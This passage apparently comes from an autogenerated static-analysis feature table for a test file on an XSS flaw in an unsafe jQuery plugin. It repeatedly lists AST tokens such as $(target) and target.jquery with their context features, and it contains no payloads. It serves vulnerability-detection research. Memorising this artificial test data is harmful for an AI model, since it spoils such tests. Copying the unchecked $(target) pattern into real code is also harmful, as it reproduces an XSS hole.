| f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:33 | target. ... defined | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:33 | target. ... defined | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:33 | target. ... defined | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:14:21:19 | jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:14:21:19 | jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:14:21:19 | jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:14:21:19 | jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:25:21:33 | undefined | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:25:21:33 | undefined | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:25:21:33 | undefined | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:25:21:33 | undefined | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:4:22:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:6:22:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:6:22:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:6:22:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:6:22:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:6:22:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:22:6:22:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:4:24:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:6:24:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:6:24:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:6:24:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:6:24:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:6:24:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:24:6:24:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:12 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:12 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:12 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:12 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:19 | target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:19 | target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:19 | target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:19 | target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:33 | target. ... defined | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:33 | target. ... defined | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:33 | target. ... defined | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:7:27:33 | target. ... defined | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:14:27:19 | jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:14:27:19 | jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:14:27:19 | jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:14:27:19 | jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:25:27:33 | undefined | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:25:27:33 | undefined | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:25:27:33 | undefined | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:27:25:27:33 | undefined | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:4:28:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:6:28:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:6:28:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:6:28:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:6:28:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:6:28:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:28:6:28:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:4:30:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:6:30:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:6:30:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:6:30:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:6:30:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:6:30:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:30:6:30:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:7:33:26 | typeof target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:7:33:26 | typeof target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:7:33:26 | typeof target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:7:33:26 | typeof target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:7:33:42 | typeof ... efined" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:7:33:42 | typeof ... efined" | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:7:33:42 | typeof ... efined" | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:7:33:42 | typeof ... efined" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:14:33:19 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:14:33:19 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:14:33:19 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:14:33:19 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:14:33:26 | target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:14:33:26 | target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:14:33:26 | target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:14:33:26 | target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:21:33:26 | jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:21:33:26 | jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:21:33:26 | jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:21:33:26 | jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:32:33:42 | "undefined" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:32:33:42 | "undefined" | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:33:32:33:42 | "undefined" | enclosingFunctionName | | +| 